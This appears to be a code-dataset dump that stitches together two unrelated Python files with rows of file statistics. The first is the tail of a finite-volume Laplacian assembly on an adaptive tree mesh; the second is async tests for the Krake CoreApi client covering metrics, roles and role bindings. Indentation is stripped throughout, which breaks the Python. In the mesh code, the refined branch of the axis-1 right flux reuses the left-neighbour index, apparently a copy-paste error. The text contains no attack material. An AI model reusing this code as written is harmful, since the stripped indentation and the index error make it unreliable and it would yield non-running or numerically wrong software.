matrix_add(tree_y, matrix, row_y, (dy/2)*(dz/2)/((dx/2)*(dx*dy*dz)), level+1, 2*i_right, 2*j+n, 2*k+o, number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k, number_of_rows)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# left flux for axis 1
if mesh.bc_compatible_local_indexes(tree_y, level, i, j-1, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_y, level, i, j-1, k)
index_left = mesh.z_curve_index(tree_y.dimension, level, i_left, j_left, k_left)
if index_left in tree_y.tree_nodes and tree_y.nisleaf[index_left] \
or index_left not in tree_y.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_y, matrix, row_y, -(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx*dz)/(dy*(dx*dy*dz)), level, i_left, j_left, k_left, number_of_rows)
else:
for o in range(2):
for m in range(2):
matrix_add(tree_y, matrix, row_y, -(dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j, 2*k+o, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j_left+1, 2*k+o, number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k, number_of_rows)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 1
if mesh.bc_compatible_local_indexes(tree_y, level, i, j+1, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_y, level, i, j+1, k)
index_right = mesh.z_curve_index(tree_y.dimension, level, i_right, j_right, k_right)
if index_right in tree_y.tree_nodes and tree_y.nisleaf[index_right] \
or index_right not in tree_y.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_y, matrix, row_y, -dx*dz/(dy*(dx*dy*dz)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, dx*dz/(dy*(dx*dy*dz)), level, i_right, j_right, k_right, number_of_rows)
else:
for o in range(2):
for m in range(2):
matrix_add(tree_y, matrix, row_y, -(dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j, 2*k+o, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j_left+1, 2*k+o, number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k, number_of_rows)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# left flux for axis 2
if mesh.bc_compatible_local_indexes(tree_y, level, i, j, k-1) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_y, level, i, j, k-1)
index_left = mesh.z_curve_index(tree_y.dimension, level, i_left, j_left, k_left)
if index_left in tree_y.tree_nodes and tree_y.nisleaf[index_left] \
or index_left not in tree_y.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_y, matrix, row_y, -(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx*dy)/(dz*(dx*dy*dz)), level, i_left, j_left, k_left, number_of_rows)
else:
for n in range(2):
for m in range(2):
matrix_add(tree_y, matrix, row_y, -(dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k_left+1, number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k, number_of_rows)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 2
if mesh.bc_compatible_local_indexes(tree_y, level, i, j, k+1) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_y, level, i, j, k+1)
index_right = mesh.z_curve_index(tree_y.dimension, level, i_right, j_right, k_right)
if index_right in tree_y.tree_nodes and tree_y.nisleaf[index_right] \
or index_right not in tree_y.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_y, matrix, row_y, -(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx*dy)/(dz*(dx*dy*dz)), level, i_right, j_right, k_right, number_of_rows)
else:
for n in range(2):
for m in range(2):
matrix_add(tree_y, matrix, row_y, -(dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k+1, number_of_rows)
matrix_add(tree_y, matrix, row_y, (dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k_right, number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_y, matrix, row_y, -2*(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k, number_of_rows)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# z_component
for row in range(number_of_rows):
index = tree_z.tree_leaves[row]
i = tree_z.nindex_x[index]
j = tree_z.nindex_y[index]
k = tree_z.nindex_z[index]
level = tree_z.nlevel[index]
dx = tree_z.ndx[index]
dy = tree_z.ndy[index]
dz = tree_z.ndz[index]
row_z = row + 2*number_of_rows
# left flux for axis 0
if mesh.bc_compatible_local_indexes(tree_z, level, i-1, j, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_z, level, i-1, j, k)
index_left = mesh.z_curve_index(tree_z.dimension, level, i_left, j_left, k_left)
if index_left in tree_z.tree_nodes and tree_z.nisleaf[index_left] \
or index_left not in tree_z.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_z, matrix, row_z, -(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dy*dz)/(dx*(dx*dy*dz)), level, i_left, j_left, k_left, 2*number_of_rows)
else:
for o in range(2):
for n in range(2):
matrix_add(tree_z, matrix, row_z, -((dy/2)*(dz/2))/((dx/2)*(dx*dy*dz)), level+1, 2*i, 2*j+n, 2*k+o, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, ((dy/2)*(dz/2))/((dx/2)*(dx*dy*dz)), level+1, 2*i_left+1, 2*j+n, 2*k+o, 2*number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_z, matrix, row_z, -2*(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 0
if mesh.bc_compatible_local_indexes(tree_z, level, i+1, j, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_z, level, i+1, j, k)
index_right = mesh.z_curve_index(tree_z.dimension, level, i_right, j_right, k_right)
if index_right in tree_z.tree_nodes and tree_z.nisleaf[index_right] \
or index_right not in tree_z.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_z, matrix, row_z, -dy*dz/(dx*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, dy*dz/(dx*(dx*dy*dz)), level, i_right, j_right, k_right, 2*number_of_rows)
else:
for o in range(2):
for n in range(2):
matrix_add(tree_z, matrix, row_z, -(dy/2)*(dz/2)/((dx/2)*(dx*dy*dz)), level+1, 2*i+1, 2*j+n, 2*k+o, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dy/2)*(dz/2)/((dx/2)*(dx*dy*dz)), level+1, 2*i_right, 2*j+n, 2*k+o, 2*number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_z, matrix, row_z, -2*(dy*dz)/(dx*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# left flux for axis 1
if mesh.bc_compatible_local_indexes(tree_z, level, i, j-1, k) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_z, level, i, j-1, k)
index_left = mesh.z_curve_index(tree_z.dimension, level, i_left, j_left, k_left)
if index_left in tree_z.tree_nodes and tree_z.nisleaf[index_left] \
or index_left not in tree_z.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_z, matrix, row_z, -(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dx*dz)/(dy*(dx*dy*dz)), level, i_left, j_left, k_left, 2*number_of_rows)
else:
for o in range(2):
for m in range(2):
matrix_add(tree_z, matrix, row_z, -(dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j, 2*k+o, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j_left+1, 2*k+o, 2*number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_z, matrix, row_z, -2*(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 1
if mesh.bc_compatible_local_indexes(tree_z, level, i, j+1, k) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_z, level, i, j+1, k)
index_right = mesh.z_curve_index(tree_z.dimension, level, i_right, j_right, k_right)
if index_right in tree_z.tree_nodes and tree_z.nisleaf[index_right] \
or index_right not in tree_z.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_z, matrix, row_z, -dx*dz/(dy*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, dx*dz/(dy*(dx*dy*dz)), level, i_right, j_right, k_right, 2*number_of_rows)
else:
for o in range(2):
for m in range(2):
matrix_add(tree_z, matrix, row_z, -(dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j, 2*k+o, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dx/2)*(dz/2)/((dy/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j_left+1, 2*k+o, 2*number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_z, matrix, row_z, -2*(dx*dz)/(dy*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# left flux for axis 2
if mesh.bc_compatible_local_indexes(tree_z, level, i, j, k-1) is not None:
i_left, j_left, k_left = mesh.bc_compatible_local_indexes(tree_z, level, i, j, k-1)
index_left = mesh.z_curve_index(tree_z.dimension, level, i_left, j_left, k_left)
if index_left in tree_z.tree_nodes and tree_z.nisleaf[index_left] \
or index_left not in tree_z.tree_nodes:
# the finest level for the left flux is the node's level
matrix_add(tree_z, matrix, row_z, -(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dx*dy)/(dz*(dx*dy*dz)), level, i_left, j_left, k_left, 2*number_of_rows)
else:
for n in range(2):
for m in range(2):
matrix_add(tree_z, matrix, row_z, -(dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k_left+1, 2*number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the left flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_z, matrix, row_z, -2*(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
# right flux for axis 2
if mesh.bc_compatible_local_indexes(tree_z, level, i, j, k+1) is not None:
i_right, j_right, k_right = mesh.bc_compatible_local_indexes(tree_z, level, i, j, k+1)
index_right = mesh.z_curve_index(tree_z.dimension, level, i_right, j_right, k_right)
if index_right in tree_z.tree_nodes and tree_z.nisleaf[index_right] \
or index_right not in tree_z.tree_nodes:
# the finest level for the right flux is the node's level
matrix_add(tree_z, matrix, row_z, -(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dx*dy)/(dz*(dx*dy*dz)), level, i_right, j_right, k_right, 2*number_of_rows)
else:
for n in range(2):
for m in range(2):
matrix_add(tree_z, matrix, row_z, -(dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k+1, 2*number_of_rows)
matrix_add(tree_z, matrix, row_z, (dx/2)*(dy/2)/((dz/2)*(dx*dy*dz)), level+1, 2*i+m, 2*j+n, 2*k_right, 2*number_of_rows)
elif boundary_conditions == "dirichlet":
# the finest level for the right flux is the node's level; this node
# receives a second contribution because of the boundary condition
matrix_add(tree_z, matrix, row_z, -2*(dx*dy)/(dz*(dx*dy*dz)), level, i, j, k, 2*number_of_rows)
elif boundary_conditions == "neumann":
#the left flux depends only on the boundary condition scalar
pass
matrix.assemble()
return matrix
if __name__ == "__main__":
output_module = importlib.import_module(cfg.output_module_name)
tree = mesh.create_new_tree(cfg.dimension, cfg.min_level, cfg.max_level, cfg.stencil_graduation, cfg.stencil_prediction)
tree.tag = "u"
mesh.listing_of_leaves(tree)
print(tree.number_of_leaves)
print("")
laplacian_matrix = create_matrix(tree, 0)
laplacian_matrix.view()
print("")
for index in tree.tree_leaves:
tree.nvalue[index] = cfg.function(tree.ncoord_x[index], tree.ncoord_y[index])
output_module.write(tree, "test_finest_grid.dat")
op.run_projection(tree)
op.encode_details(tree)
op.run_thresholding(tree)
op.run_grading(tree)
op.run_pruning(tree)
mesh.listing_of_leaves(tree)
print(tree.number_of_leaves)
print("")
output_module.write(tree, "test_adapted_grid.dat")
laplacian_matrix = create_matrix(tree, 0)
laplacian_matrix.view()
print("")
laplacian_bc = create_bc_scalar(tree, 0)
laplacian_bc.view()
print("")
| 51.052751 | 151 | 0.558504 | 10,382 | 67,747 | 3.457041 | 0.019649 | 0.036109 | 0.065197 | 0.029422 | 0.94617 | 0.939205 | 0.934162 | 0.933437 | 0.930846 | 0.929314 | 0 | 0.017958 | 0.326007 | 67,747 | 1,326 | 152 | 51.091252 | 0.768073 | 0.149143 | 0 | 0.722222 | 0 | 0 | 0.011484 | 0.000371 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003704 | false | 0.044444 | 0.01358 | 0 | 0.028395 | 0.009877 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
18e8cc5aac3a05e9140749711e5363b182b11a82 | 18,092 | py | Python | krake/tests/client/test_core.py | rak-n-rok/Krake | 2f0d4a382b99639e2c1149ee8593a9bb589d2d3f | [
"Apache-2.0"
] | 1 | 2020-05-29T08:43:32.000Z | 2020-05-29T08:43:32.000Z | krake/tests/client/test_core.py | rak-n-rok/Krake | 2f0d4a382b99639e2c1149ee8593a9bb589d2d3f | [
"Apache-2.0"
] | null | null | null | krake/tests/client/test_core.py | rak-n-rok/Krake | 2f0d4a382b99639e2c1149ee8593a9bb589d2d3f | [
"Apache-2.0"
] | 1 | 2019-11-19T13:39:02.000Z | 2019-11-19T13:39:02.000Z | from operator import attrgetter
from krake.api.app import create_app
from krake.client import Client
from krake.client.core import CoreApi
from krake.data.core import (
GlobalMetric,
GlobalMetricsProvider,
RoleBinding,
Role,
WatchEventType,
)
from krake.test_utils import with_timeout, aenumerate
from tests.factories.core import (
GlobalMetricFactory,
GlobalMetricsProviderFactory,
MetricsProviderSpecFactory,
MetricSpecProviderFactory,
RoleBindingFactory,
RoleFactory,
RoleRuleFactory,
)
async def test_create_global_metric(aiohttp_server, config, db, loop):
data = GlobalMetricFactory()
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.create_global_metric(body=data)
assert received.api == "core"
assert received.kind == "GlobalMetric"
assert received.metadata.name == data.metadata.name
assert received.metadata.namespace is None
assert received.metadata.created
assert received.metadata.modified
stored = await db.get(GlobalMetric, name=data.metadata.name)
assert stored == received
async def test_delete_global_metric(aiohttp_server, config, db, loop):
data = GlobalMetricFactory(metadata__finalizers="keep-me")
await db.put(data)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.delete_global_metric(name=data.metadata.name)
assert received.api == "core"
assert received.kind == "GlobalMetric"
assert received.spec == data.spec
assert received.metadata.deleted is not None
stored = await db.get(GlobalMetric, name=data.metadata.name)
assert stored == received
async def test_list_global_metrics(aiohttp_server, config, db, loop):
# Populate database
data = [
GlobalMetricFactory(),
GlobalMetricFactory(),
GlobalMetricFactory(),
GlobalMetricFactory(),
GlobalMetricFactory(),
GlobalMetricFactory(),
]
for elt in data:
await db.put(elt)
# Start API server
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.list_global_metrics()
assert received.api == "core"
assert received.kind == "GlobalMetricList"
key = attrgetter("metadata.name")
assert sorted(received.items, key=key) == sorted(data, key=key)
@with_timeout(3)
async def test_watch_global_metrics(aiohttp_server, config, db, loop):
data = [
GlobalMetricFactory(),
GlobalMetricFactory(),
GlobalMetricFactory(),
GlobalMetricFactory(),
]
async def modify():
for elt in data:
await db.put(elt)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
async with core_api.watch_global_metrics() as watcher:
modifying = loop.create_task(modify())
async for i, event in aenumerate(watcher):
expected = data[i]
assert event.type == WatchEventType.ADDED
assert event.object == expected
# '1' because of the offset length-index and '1' for the resource in
# another namespace
if i == len(data) - 2:
break
await modifying
async def test_read_global_metric(aiohttp_server, config, db, loop):
data = GlobalMetricFactory()
await db.put(data)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.read_global_metric(name=data.metadata.name)
assert received == data
async def test_update_global_metric(aiohttp_server, config, db, loop):
data = GlobalMetricFactory()
await db.put(data)
data.spec.provider = MetricSpecProviderFactory()
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.update_global_metric(
name=data.metadata.name, body=data
)
assert received.api == "core"
assert received.kind == "GlobalMetric"
assert received.spec == data.spec
assert data.metadata.modified < received.metadata.modified
stored = await db.get(GlobalMetric, name=data.metadata.name)
assert stored == received
async def test_create_global_metrics_provider(aiohttp_server, config, db, loop):
data = GlobalMetricsProviderFactory()
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.create_global_metrics_provider(body=data)
assert received.api == "core"
assert received.kind == "GlobalMetricsProvider"
assert received.metadata.name == data.metadata.name
assert received.metadata.namespace is None
assert received.metadata.created
assert received.metadata.modified
stored = await db.get(GlobalMetricsProvider, name=data.metadata.name)
assert stored == received
async def test_delete_global_metrics_provider(aiohttp_server, config, db, loop):
data = GlobalMetricsProviderFactory(metadata__finalizers="keep-me")
await db.put(data)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.delete_global_metrics_provider(
name=data.metadata.name
)
assert received.api == "core"
assert received.kind == "GlobalMetricsProvider"
assert received.spec == data.spec
assert received.metadata.deleted is not None
stored = await db.get(GlobalMetricsProvider, name=data.metadata.name)
assert stored == received
async def test_list_global_metrics_providers(aiohttp_server, config, db, loop):
# Populate database
data = [
GlobalMetricsProviderFactory(),
GlobalMetricsProviderFactory(),
GlobalMetricsProviderFactory(),
GlobalMetricsProviderFactory(),
GlobalMetricsProviderFactory(),
GlobalMetricsProviderFactory(),
]
for elt in data:
await db.put(elt)
# Start API server
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.list_global_metrics_providers()
assert received.api == "core"
assert received.kind == "GlobalMetricsProviderList"
key = attrgetter("metadata.name")
assert sorted(received.items, key=key) == sorted(data, key=key)
@with_timeout(3)
async def test_watch_global_metrics_providers(aiohttp_server, config, db, loop):
data = [
GlobalMetricsProviderFactory(),
GlobalMetricsProviderFactory(),
GlobalMetricsProviderFactory(),
GlobalMetricsProviderFactory(),
]
async def modify():
for elt in data:
await db.put(elt)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
async with core_api.watch_global_metrics_providers() as watcher:
modifying = loop.create_task(modify())
async for i, event in aenumerate(watcher):
expected = data[i]
assert event.type == WatchEventType.ADDED
assert event.object == expected
# '1' because of the offset length-index and '1' for the resource in
# another namespace
if i == len(data) - 2:
break
await modifying
async def test_read_global_metrics_provider(aiohttp_server, config, db, loop):
data = GlobalMetricsProviderFactory()
await db.put(data)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.read_global_metrics_provider(name=data.metadata.name)
assert received == data
async def test_update_global_metrics_provider(aiohttp_server, config, db, loop):
data = GlobalMetricsProviderFactory(spec__type="static")
await db.put(data)
data.spec = MetricsProviderSpecFactory(type="prometheus")
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.update_global_metrics_provider(
name=data.metadata.name, body=data
)
assert received.api == "core"
assert received.kind == "GlobalMetricsProvider"
assert received.spec == data.spec
assert data.metadata.modified < received.metadata.modified
stored = await db.get(GlobalMetricsProvider, name=data.metadata.name)
assert stored == received
async def test_create_role(aiohttp_server, config, db, loop):
data = RoleFactory()
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.create_role(body=data)
assert received.api == "core"
assert received.kind == "Role"
assert received.metadata.name == data.metadata.name
assert received.metadata.namespace is None
assert received.metadata.created
assert received.metadata.modified
stored = await db.get(Role, name=data.metadata.name)
assert stored == received
async def test_delete_role(aiohttp_server, config, db, loop):
data = RoleFactory(metadata__finalizers="keep-me")
await db.put(data)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.delete_role(name=data.metadata.name)
assert received.api == "core"
assert received.kind == "Role"
assert received.metadata.deleted is not None
stored = await db.get(Role, name=data.metadata.name)
assert stored == received
async def test_list_roles(aiohttp_server, config, db, loop):
# Populate database
data = [
RoleFactory(),
RoleFactory(),
RoleFactory(),
RoleFactory(),
RoleFactory(),
RoleFactory(),
]
for elt in data:
await db.put(elt)
# Start API server
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.list_roles()
assert received.api == "core"
assert received.kind == "RoleList"
key = attrgetter("metadata.name")
assert sorted(received.items, key=key) == sorted(data, key=key)
@with_timeout(3)
async def test_watch_roles(aiohttp_server, config, db, loop):
data = [RoleFactory(), RoleFactory(), RoleFactory(), RoleFactory()]
async def modify():
for elt in data:
await db.put(elt)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
async with core_api.watch_roles() as watcher:
modifying = loop.create_task(modify())
async for i, event in aenumerate(watcher):
expected = data[i]
assert event.type == WatchEventType.ADDED
assert event.object == expected
# '1' because of the offset length-index and '1' for the resource in
# another namespace
if i == len(data) - 2:
break
await modifying
async def test_read_role(aiohttp_server, config, db, loop):
data = RoleFactory()
await db.put(data)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.read_role(name=data.metadata.name)
assert received == data
async def test_update_role(aiohttp_server, config, db, loop):
data = RoleFactory()
await db.put(data)
data.rules.append(RoleRuleFactory())
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.update_role(name=data.metadata.name, body=data)
assert received.api == "core"
assert received.kind == "Role"
assert received.rules == data.rules
assert data.metadata.modified < received.metadata.modified
stored = await db.get(Role, name=data.metadata.name)
assert stored == received
async def test_create_role_binding(aiohttp_server, config, db, loop):
data = RoleBindingFactory()
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.create_role_binding(body=data)
assert received.api == "core"
assert received.kind == "RoleBinding"
assert received.metadata.name == data.metadata.name
assert received.metadata.namespace is None
assert received.metadata.created
assert received.metadata.modified
stored = await db.get(RoleBinding, name=data.metadata.name)
assert stored == received
async def test_delete_role_binding(aiohttp_server, config, db, loop):
data = RoleBindingFactory(metadata__finalizers="keep-me")
await db.put(data)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.delete_role_binding(name=data.metadata.name)
assert received.api == "core"
assert received.kind == "RoleBinding"
assert received.metadata.deleted is not None
stored = await db.get(RoleBinding, name=data.metadata.name)
assert stored == received
async def test_list_role_bindings(aiohttp_server, config, db, loop):
# Populate database
data = [
RoleBindingFactory(),
RoleBindingFactory(),
RoleBindingFactory(),
RoleBindingFactory(),
RoleBindingFactory(),
RoleBindingFactory(),
]
for elt in data:
await db.put(elt)
# Start API server
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.list_role_bindings()
assert received.api == "core"
assert received.kind == "RoleBindingList"
key = attrgetter("metadata.name")
assert sorted(received.items, key=key) == sorted(data, key=key)
@with_timeout(3)
async def test_watch_role_bindings(aiohttp_server, config, db, loop):
data = [
RoleBindingFactory(),
RoleBindingFactory(),
RoleBindingFactory(),
RoleBindingFactory(),
]
async def modify():
for elt in data:
await db.put(elt)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
async with core_api.watch_role_bindings() as watcher:
modifying = loop.create_task(modify())
async for i, event in aenumerate(watcher):
expected = data[i]
assert event.type == WatchEventType.ADDED
assert event.object == expected
# '1' because of the offset length-index and '1' for the resource in
# another namespace
if i == len(data) - 2:
break
await modifying
async def test_read_role_binding(aiohttp_server, config, db, loop):
data = RoleBindingFactory()
await db.put(data)
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.read_role_binding(name=data.metadata.name)
assert received == data
async def test_update_role_binding(aiohttp_server, config, db, loop):
data = RoleBindingFactory()
await db.put(data)
data.users.append("test-user")
data.roles.append("test-role")
server = await aiohttp_server(create_app(config=config))
async with Client(url=f"http://{server.host}:{server.port}", loop=loop) as client:
core_api = CoreApi(client)
received = await core_api.update_role_binding(
name=data.metadata.name, body=data
)
assert received.api == "core"
assert received.kind == "RoleBinding"
assert received.users == data.users
assert received.roles == data.roles
assert data.metadata.modified < received.metadata.modified
stored = await db.get(RoleBinding, name=data.metadata.name)
assert stored == received
| 32.716094 | 87 | 0.676155 | 2,161 | 18,092 | 5.540028 | 0.056455 | 0.073672 | 0.037421 | 0.046776 | 0.935516 | 0.876211 | 0.871784 | 0.841547 | 0.814066 | 0.793017 | 0 | 0.001132 | 0.218992 | 18,092 | 552 | 88 | 32.775362 | 0.846143 | 0.026476 | 0 | 0.744845 | 0 | 0 | 0.068311 | 0.005001 | 0 | 0 | 0 | 0 | 0.234536 | 1 | 0 | false | 0 | 0.018041 | 0 | 0.018041 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
